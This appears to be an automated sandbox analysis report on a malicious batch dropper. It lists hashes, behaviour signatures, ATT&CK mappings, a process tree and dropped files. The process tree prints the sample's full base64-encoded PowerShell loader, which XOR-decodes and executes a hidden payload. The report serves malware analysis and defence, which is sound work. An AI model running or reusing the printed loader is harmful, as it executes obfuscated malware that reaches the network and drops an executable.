3464395edcce5e6148164c463f2fe5fdc5b92f4cdc175db8c4b2c50bb89b5eaf

General

Target

Dropper.bat
Size

6KB
MD5

569d507e7fdc933deff3b58813d97aa4
SHA1

51024acd8743f7373d822fb12b51051f8a56863d
SHA256

3464395edcce5e6148164c463f2fe5fdc5b92f4cdc175db8c4b2c50bb89b5eaf
SHA512

08044c392db675232715f6105463ebfb7287bf926ccbb1322b5b1f9556696c8d9f070cd10a639f04fc5afa5930f2fd37ead4700624d13ef88575b95aefa1cde8
SSDEEP

192:qQofeU+tLohTleG/wnO6ppxi5zBgH6sgUJ:zof5+tLohTleawO6jxi5zBYgO

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
7	1532	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1532	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1532	powershell.exe
1532	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1532	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 3524 wrote to memory of 1532	3524	cmd.exe	85
PID 3524 wrote to memory of 1532	3524	cmd.exe	85
PID 1532 wrote to memory of 3644	1532	powershell.exe	86
PID 1532 wrote to memory of 3644	1532	powershell.exe	86
PID 3644 wrote to memory of 3360	3644	csc.exe	88
PID 3644 wrote to memory of 3360	3644	csc.exe	88

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Dropper.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3524
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoExit -encodedCommand JABoAGUAaABlAGgAZQAgAD0AIAAiAGQAaQBFAGcATQBYAEoAdgBjAGgASgB3AFgAMQBnAG4ASQBUAHMAOABOAFgASQBCAEsAeQBFAG0ATgB6ADkAcABYADEAZwBuAEkAVABzADgATgBYAEkAQgBLAHkARQBtAE4AegA5ADgAQQBDAGMAOABKAGoAcwAvAE4AMwB3AGIAUABDAFkAMwBJAEQAMABpAEEAVABjAGcASgBEAHMAeABOAHkARgBwAFgAMQBnAG4ASQBUAHMAOABOAFgASQBCAEsAeQBFAG0ATgB6ADkAOABCAGoAbwBnAE4AegBNADIATwB6AHcAMQBhAFYAOQBZAFgAMQBnAGkASgB6AEEAKwBPAHoARgB5AE0AVAA0AHoASQBTAEYAeQBBAGoATQBtAE0AVABwAGYAVwBDAGwAZgBXAEgASgB5AGMAbgBJAEoARgBqADQAKwBHAHoAOABpAFAAUwBBAG0AZQBuAEEANQBOAHkAQQA4AE4AegA1AGgAWQBIAEIANwBEADEAOQBZAGMAbgBKAHkAYwBpAEkAbgBNAEQANAA3AE0AWABJAGgASgBqAE0AbQBPAHoARgB5AE4AeQBvAG0ATgB5AEEAOABjAGgAcwA4AEoAZwBJAG0ASQBIAEkAVgBOAHkAWQBDAEkARAAwAHgARQB6AFkAMgBJAEQAYwBoAEkAWABvAGIAUABDAFkAQwBKAGkAQgB5AE8AaAA4ADkATgBpAGMAKwBOADMANQB5AEkAUwBZAGcATwB6AHcAMQBjAGkASQBnAFAAVABFAGMATQB6ADgAMwBlADIAbABmAFcASABKAHkAYwBuAEkASgBGAGoANAArAEcAegA4AGkAUABTAEEAbQBlAG4AQQA1AE4AeQBBADgATgB6ADUAaABZAEgAQgA3AEQAMQA5AFkAYwBuAEoAeQBjAGkASQBuAE0ARAA0ADcATQBYAEkAaABKAGoATQBtAE8AegBGAHkATgB5AG8AbQBOAHkAQQA4AGMAaABzADgASgBnAEkAbQBJAEgASQBlAFAAVABNADIASABqAHMAdwBJAEQATQBnAEsAMwBvAGgASgBpAEEANwBQAEQAVgB5AFAARABNAC8ATgAzAHQAcABYADEAaAB5AGMAbgBKAHkAQwBSAFkAKwBQAGgAcwAvAEkAagAwAGcASgBuAHAAdwBPAFQAYwBnAFAARABjACsAWQBXAEIAdwBlAHcAOQBmAFcASABKAHkAYwBuAEkAaQBKAHoAQQArAE8AegBGAHkASQBTAFkAegBKAGoAcwB4AGMAagBjAHEASgBqAGMAZwBQAEgASQB3AFAAVAAwACsAYwBnAFEANwBJAEMAWQBuAE0AegA0AEMASQBEADAAbQBOAHoARQBtAGUAaABzADgASgBnAEkAbQBJAEgASQArAEkAaABNADIATgBpAEEAMwBJAFMARgArAGMAZwBjAGIAUABDAFoAaABZAEgASQAyAEoAUQBFADcASwBEAGQAKwBjAGkAYwA3AFAAQwBaAHkATgBEADQAYwBOAHkAVQBDAEkARAAwAG0ATgB6AEUAbQBmAG4ASQA5AEoAeQBaAHkASgB6AHMAOABKAG4ASQArAEkAagBRACsASABUADQAMgBBAGkAQQA5AEoAagBjAHgASgBuAHQAcABYADEAaAB5AGMAbgBKAHkASQBpAGMAdwBQAGoAcwB4AGMAaQBFAG0ATQB5AFkANwBNAFgASQBrAFAAVABzADIAYwBoAEEAcgBJAGoATQBoAEkAWABwADcAWAAxAGgAeQBjAG4ASgB5AEsAVgA5AFkAYwBuAEoAeQBjAG4ASgB5AGMAbgBJAGIAUABDAFkAQwBKAGkAQgB5AFAAagBzAHcAYwBtADkAeQBIAGoAMAB6AE4AaAA0ADcATQBDAEEAegBJAEMAdAA2AGMARABOAHcAZQBYAEEALwBjAEgAbAB3AEkAVAB0ADgAYwBIAGwAdwBOAGoANAArAGMASAB0AHAAWAAxAGgAeQBjAG4ASgB5AGMAbgBKAHkAYwBoAHMAOABKAGcASQBtAEkASABJAHoAUAB5AEUANwBjAG0AOQB5AEYAVABjAG0AQQBpAEEAOQBNAFIATQAyAE4AaQBBADMASQBTAEYANgBQAGoAcwB3AGYAbgBKAHcARQB6ADkAdwBlAFgAQQBoAGMASABsAHcATwB3AEUAeABNAHoAeAB3AGUAWABBAFEAYwBIAGwAdwBKAHoAUQAwAE4AeQBCAHcAZQAyAGwAZgBXAEgASgB5AGMAbgBKAHkAYwBuAEoAeQBHAHoAdwBtAEEAaQBZAGcAYwBqAFEANwBQAEQATQArAGMAbQA5AHkARwB6AHcAbQBBAGkAWQBnAGYAQgBNADIATgBuAG8AegBQAHkARQA3AGYAbgBKAGkASwBtAHQAbgBlADIAbABmAFcASABKAHkAYwBuAEoAeQBjAG4ASgB5AEoAegBzADgASgBuAEkAOQBQAGoAWgB5AGIAMwBKAGkAYQBWADkAWQBjAG4ASgB5AGMAbgBKAHkAYwBuAEkARQBPAHkAQQBtAEoAegBNACsAQQBpAEEAOQBKAGoAYwB4AEoAbgBvADAATwB6AHcAegBQAG4ANQB5AGUAZwBjAGIAUABDAFoAaABZAEgAdABpAEsAbQBOACsAYwBtAEkAcQBaAG0ASgArAGMAagAwAG4ASgBuAEkAOQBQAGoAWgA3AGEAVgA5AFkAWAAxAGgAeQBjAG4ASgB5AGMAbgBKAHkAYwBoAEUAOQBQAEMARQA5AFAAagBkADgAQgBTAEEANwBKAGoAYwBlAE8AegB3ADMAZQBqADAAKwBOAG4AdABwAFgAMQBoAHkAYwBuAEoAeQBjAG4ASgB5AGMAagBBAHIASgBqAGMASgBEADMASQBpAE0AeQBZAHgATwBuAEoAdgBjAGoAdwAzAEoAWABJAHcASwB5AFkAMwBDAFEAOQB5AEsAWABKAGkASwBtAFYAbgBjAGkAOQBwAFgAMQBoAGYAVwBIAEoAeQBjAG4ASgB5AGMAbgBKAHkASAB6AE0AZwBJAFQAbwB6AFAAbgB3AFIAUABTAEkAcgBlAGkASQB6AEoAagBFADYAZgBuAEoAaQBmAG4ASQAwAE8AegB3AHoAUABuADUAeQBZADMAdABwAFgAMQBoAGYAVwBIAEoAeQBjAG4ASgB5AGMAbgBKAHkAQgBEAHMAZwBKAGkAYwB6AFAAZwBJAGcAUABTAFkAMwBNAFMAWgA2AE4ARABzADgATQB6ADUAKwBjAG4AbwBIAEcAegB3AG0AWQBXAEIANwBZAGkAcABqAGYAbgBJADkAUABqAFoAKwBjAGoAMABuAEoAbgBJADkAUABqAFoANwBhAFYAOQBZAGMAbgBKAHkAYwBpADkAZgBXAEMAOQBmAFcASABBAFMAWAAxAGgAZgBXAEIATQAyAE4AbgA4AEcASwB5AEkAMwBjAG4AWQBoAEkARABGAHkAZgB4ADQAegBQAEQAVQBuAE0AegBVADMAYwBoAEUAQgBPAGoATQBnAEkAbgBKAGYAVwBGADkAWQBDAFEASQB6AEoAagBFADYARAAyAGgAbwBFAEMAcwBpAE0AeQBFAGgAZQBuAHQAZgBXAEgARgB5AEEAQgBjAFQARgBuAEkAUgBFAHcAQQBYAEYAQQBjAGUASABnAHQAZgBXAEgARgB5AEEAQgBjAEMASABoAE0AUgBGADMASQBHAEcAaABkAHkASABoAHMAYwBHAFgASQBUAEgAQgBaAHkARQB4AFEARwBGAHcAQgB5AEIAaABvAFgAYwBoADAASABCAGcASQBIAEIAbgBJAEwASABRAGQAeQBCAFIATQBjAEIAbgBJAEcASABYAEkAUQBGADMASQBSAEUAeAA0AGUARgB4AFoAeQBFAHgAdwBXAGMAZwBBAFgASABCAE0AZgBGADMASQBHAEcAaABkAHkAQgBoAGMAaABKAG4AdwAzAEsAagBkAHkAQgBoADEAeQBFAHgAdwBMAEIAaABvAGIASABCAFYAeQBDAHgAMABIAGMAZwBVAFQASABBAFoAZgBXAEMAVQAxAE4AeQBaAHkAYwBEAG8AbQBKAGkASQBoAGEASAAxADkASgBTAFUAbABmAEQAWQBnAFAAUwBJAHcAUABTAHAAOABNAFQAMAAvAGYAUwBFAHgAUABuADAAMABPADMAMAArAE0AUwBFADgATgBHAFUAaABJADIARgBsAEsAMgBNACsAWgBtAG8ALwBLAEQAeABsAEoAVwBkADkARwBuADgAZABKAHkAWQBpAEoAeQBaADgATgB5AG8AMwBiAFMAQQArAE8AVABjAHIAYgB6AHMAdwBKAGoARgBpAFkAaQBJAGkATwBqAFUAagBKAFcAWgBqAFkARwB0AGgAUABTAGcAcQBQAEQAQgBnAFkAegBCADAASQBTAFoAdgBLAEMAaABoAEsAegBBAHcATwBTAFIAMABOAGoANQB2AFkAMwBCAHkAZgB4ADEAeQBjAEIARgBvAEQAZwBjAGgATgB5AEEAaABEAG4AWQAzAFAAQwBSAG8AQgB3AEUAWABBAEIAdwBUAEgAeABjAE8ARQB5AEkAaQBGAGoATQBtAE0AdwA0AGUAUABUAEUAegBQAGcANABHAE4AegA4AGkARABoAHAALwBIAFMAYwBtAEkAaQBjAG0AZgBEAGMAcQBOADMAQgBmAFcAQQBFAG0ATQB5AEEAbQBmAHcASQBnAFAAVABFADMASQBTAEYAeQBmAHgAUQA3AFAAagBjAEMATQB5AFkANgBjAG4AQQBSAGEAQQA0AEgASQBUAGMAZwBJAFEANQAyAE4AegB3AGsAYQBBAGMAQgBGAHcAQQBjAEUAeAA4AFgARABoAE0AaQBJAGgAWQB6AEoAagBNAE8ASABqADAAeABNAHoANABPAEIAagBjAC8ASQBnADQAYQBmAHgAMABuAEoAaQBJAG4ASgBuAHcAMwBLAGoAZAB3AGMAZwA9AD0AIgANAAoAJABYAG8AcgBfAFYAYQBsACAAPQAgADgAMgANAAoAJAB4AHIAIAA9ACAAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGgAZQBoAGUAaABlACkADQAKACQAZgBhAGYAYQBmACAAPQAgACQAeAByACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAByAGUAdAB1AHIAbgAgACQAXwAgAC0AYgB4AG8AcgAgACQAWABvAHIAXwBWAGEAbAAgAH0ADQAKACQAZABlAGMAcwBjAHIAIAA9ACAAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AHUAdABmADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAZgBhAGYAYQBmACkADQAKAGkAZQB4ACAAJABkAGUAYwBzAGMAcgANAAoA
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1532
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xpbmchji\xpbmchji.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3644
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES48E0.tmp" "c:\Users\Admin\AppData\Local\Temp\xpbmchji\CSC91D858BBC8614CD88D53C765F34A21DE.TMP"
      4⤵
      PID:3360

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\H-Output.exe

Filesize
73KB

MD5
d73b595b00f0f23fc2c2f6b2e8c713c5

SHA1
5ae5c047594a039585a6af82de408ce4029cfb7e

SHA256
1a4e960158da934b395ecd365e41296ebfeb7c29cbca4d642adf7aafb9ec9e5b

SHA512
a18b7bbbea107fb38a213ce70c9683b23b9eb03142a22ea13d2ef6d107e277f1b38c6c3dece4ff889f5932c62befd17b1b3b1303bf281187338335d982e5e599

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES48E0.tmp

Filesize
1KB

MD5
3d17080ed579a556b7fdc87666f5f803

SHA1
b4f9f8f32743dd41ce6a568c3bd0d8569e3fa297

SHA256
b3cc108e3f10e31997a3e845a19ff6ff0fcd37cc4ae54b35a29a234fdf731445

SHA512
a02de92a7d3223773ac0b42d7ac3c3a931965a3e4a34074013d3991428ce9d5e0f833eb56291ff444cb3fdeb97b65fe4ee30c8bb32cfc5a7f137b3d2304396f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ncqiq1et.cfu.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\xpbmchji\xpbmchji.dll

Filesize
3KB

MD5
0663dfe99e0cbcfb5d076ed049b65d44

SHA1
70bfb25ffed843cdff0e039f844e165d33e27268

SHA256
643d0dffb7f78276db14ad21301911d0540fd12b011721fb662b724451dedc2f

SHA512
c9e858a0d9cdbfe2cc89761f70c58f055b71c3548dd651c7b4c8aa5c40b9c24d4859d3f728b97dd104bb9b0056f5eaed1f54590ca15a9681576407898edd8c99

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xpbmchji\CSC91D858BBC8614CD88D53C765F34A21DE.TMP

Filesize
652B

MD5
6566b1b19f2664c18ab874a60a17d3a7

SHA1
e636b60dff4d475491cdf871097f4ddf39954fb5

SHA256
94b8705e73818a8a2840d84a0b3aee5e0446dbad54a1f45058266f1bd3303e75

SHA512
38ad34cfb6f436b364042dd6da4a8dfb43e379eadad9fbfea6d68fbd5af14a8203b32a01be6b3da36ec6575e6affc763df18f4ae5dd2e6f3b1b5ffcec9d181fb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xpbmchji\xpbmchji.0.cs

Filesize
954B

MD5
60c0d4aebef0d650d89729e1bf02de63

SHA1
4f1499e94be62af8a4ece3a8c505b3766c338ff7

SHA256
0b6e580ba0c5bbb2ac19e2fe91bacb79d1b18cab8c07150e6a944b6ace5d7799

SHA512
9e6233b5c2e2cf6ce4b883b33349541c5e7f6f75f711af37d352df8b72d70ac3d123cdccd2fed674d69da5fad3e27de9a7acc92864d47a69d6f8a6d98867760a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xpbmchji\xpbmchji.cmdline

Filesize
369B

MD5
3471b3e1bcea022e165cdbaaeb5ca95e

SHA1
72cdc5cce68d8144a45416b463c9678d40ba1565

SHA256
2a777af75ebf92196a7fe4b43cac505e56232644eb1c73f615ce28fd4d21f145

SHA512
cc7e447340e5d9290168f645f161a4a0cad6774217407f9c0b4ad73d4b11a06f325ca64eda6b8e98c2322dc7d3c273487483d95bdce00e76b279ec33c1c92f50

Download Submit
memory/1532-10-0x0000019BFC450000-0x0000019BFC472000-memory.dmp

Filesize
136KB

Download
memory/1532-0-0x00007FFA085D3000-0x00007FFA085D5000-memory.dmp

Filesize
8KB

Download
memory/1532-12-0x00007FFA085D0000-0x00007FFA09091000-memory.dmp

Filesize
10.8MB

Download
memory/1532-26-0x0000019BFC600000-0x0000019BFC608000-memory.dmp

Filesize
32KB

Download
memory/1532-13-0x0000019BFC880000-0x0000019BFC8C4000-memory.dmp

Filesize
272KB

Download
memory/1532-11-0x00007FFA085D0000-0x00007FFA09091000-memory.dmp

Filesize
10.8MB

Download
memory/1532-37-0x00007FFA085D0000-0x00007FFA09091000-memory.dmp

Filesize
10.8MB

Download
memory/1532-38-0x00007FFA085D0000-0x00007FFA09091000-memory.dmp

Filesize
10.8MB

Download
memory/1532-39-0x0000019BFCAD0000-0x0000019BFCB46000-memory.dmp

Filesize
472KB

Download
memory/1532-41-0x00007FFA085D0000-0x00007FFA09091000-memory.dmp

Filesize
10.8MB

Download
memory/1532-42-0x00007FFA085D3000-0x00007FFA085D5000-memory.dmp

Filesize
8KB

Download
memory/1532-43-0x00007FFA085D0000-0x00007FFA09091000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing